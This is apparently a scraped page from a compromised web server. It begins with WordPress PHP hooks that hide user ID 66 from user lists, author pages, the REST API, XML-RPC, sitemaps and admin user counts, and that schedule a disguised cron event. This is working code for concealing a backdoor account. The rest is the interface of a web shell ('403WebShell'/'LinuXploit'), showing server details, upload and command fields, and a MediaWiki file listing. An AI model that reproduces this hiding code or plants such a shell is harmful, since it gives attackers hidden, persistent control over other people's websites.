add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/openusability/wiki/includes/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
November 22 2024 15:30:27
www-data / www-data
0755
i18n
--
November 22 2024 15:28:45
www-data / www-data
0755
ApiAMCreateAccount.php
4.027 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiAuthManagerHelper.php
10.778 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiBase.php
88.753 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiBlock.php
5.156 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiChangeAuthenticationData.php
2.951 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiCheckToken.php
2.241 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiClearHasMsg.php
1.457 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiClientLogin.php
4.283 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiComparePages.php
3.51 KB
November 22 2024 15:28:30
www-data / www-data
0775
ApiContinuationManager.php
7.06 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiCreateAccount.php
9.317 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiDelete.php
6.367 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiDisabled.php
1.417 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiEditPage.php
18.278 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiEmailUser.php
2.792 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiErrorFormatter.php
9.318 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiExpandTemplates.php
6.898 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFeedContributions.php
6.444 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFeedRecentChanges.php
5.316 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFeedWatchlist.php
8.965 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFileRevert.php
3.863 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatBase.php
12.307 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatDbg.php
1.438 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatDump.php
1.464 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatFeedWrapper.php
3.515 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatJson.php
4.02 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatNone.php
1.069 KB
November 22 2024 15:28:31
www-data / www-data
0775
ApiFormatPhp.php
2.472 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiFormatRaw.php
3.016 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiFormatTxt.php
1.419 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiFormatWddx.php
3.786 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiFormatXml.php
8.962 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiFormatYaml.php
1.144 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiHelp.php
25.568 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiHelpParamValueMessage.php
1.905 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiImageRotate.php
5.998 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiImport.php
4.951 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiLinkAccount.php
3.87 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiLogin.php
8.457 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiLogout.php
2.039 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiMain.php
56.516 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiManageTags.php
3.038 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiMergeHistory.php
3.751 KB
November 22 2024 15:28:32
www-data / www-data
0775
ApiMessage.php
5.642 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiModuleManager.php
8.32 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiMove.php
7.219 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiOpenSearch.php
11.813 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiOptions.php
5.246 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiPageSet.php
43.022 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiParamInfo.php
13.172 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiParse.php
25.792 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiPatrol.php
2.987 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiProtect.php
5.535 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiPurge.php
4.983 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQuery.php
18.742 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllCategories.php
5.795 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllDeletedRevisions.php
14.426 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllImages.php
11.644 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllLinks.php
8.69 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllMessages.php
7.274 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllPages.php
9.653 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllRevisions.php
8.336 KB
November 22 2024 15:28:33
www-data / www-data
0775
ApiQueryAllUsers.php
11.501 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryAuthManagerInfo.php
4.104 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryBacklinks.php
17.24 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryBacklinksprop.php
11.276 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryBase.php
16.222 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryBlocks.php
10.303 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryCategories.php
6.53 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryCategoryInfo.php
3.292 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryCategoryMembers.php
11.99 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryContributors.php
7.495 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryDeletedRevisions.php
9.636 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryDeletedrevs.php
16.418 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryDisabled.php
1.398 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryDuplicateFiles.php
5.386 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryExtLinksUsage.php
5.936 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryExternalLinks.php
3.79 KB
November 22 2024 15:28:34
www-data / www-data
0775
ApiQueryFileRepoInfo.php
3.198 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryFilearchive.php
9.176 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryGeneratorBase.php
3.094 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryIWBacklinks.php
5.621 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryIWLinks.php
5.117 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryImageInfo.php
25.976 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryImages.php
4.878 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryInfo.php
27.281 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryLangBacklinks.php
5.547 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryLangLinks.php
5.439 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryLinks.php
6.632 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryLogEvents.php
14.021 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryMyStashedFiles.php
4.04 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryORM.php
6.124 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryPagePropNames.php
2.956 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryPageProps.php
3.126 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryPagesWithProp.php
4.839 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryPrefixSearch.php
3.978 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryProtectedTitles.php
6.834 KB
November 22 2024 15:28:35
www-data / www-data
0775
ApiQueryQueryPage.php
4.604 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryRandom.php
6.564 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryRecentChanges.php
21.266 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryRevisions.php
14.423 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryRevisionsBase.php
15.641 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQuerySearch.php
11.906 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQuerySiteinfo.php
26.468 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryStashImageInfo.php
4.251 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryTags.php
4.89 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryTokens.php
4.001 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryUserContributions.php
16.073 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryUserInfo.php
9.857 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryUsers.php
10.241 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryWatchlist.php
16.089 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiQueryWatchlistRaw.php
6.341 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiRemoveAuthenticationData.php
3.287 KB
November 22 2024 15:28:36
www-data / www-data
0775
ApiResetPassword.php
3.895 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiResult.php
45.55 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiRevisionDelete.php
6.415 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiRollback.php
5.417 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiRsd.php
4.707 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiSerializable.php
1.548 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiSetNotificationTimestamp.php
7.209 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiStashEdit.php
15.431 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiTag.php
4.602 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiTokens.php
3.108 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiUnblock.php
3.522 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiUndelete.php
3.898 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiUpload.php
26.066 KB
November 22 2024 15:28:38
www-data / www-data
0775
ApiUserrights.php
3.918 KB
November 22 2024 15:28:37
www-data / www-data
0775
ApiWatch.php
5.159 KB
November 22 2024 15:28:37
www-data / www-data
0775

Youez - 2016 - github.com/yon3zu
LinuXploit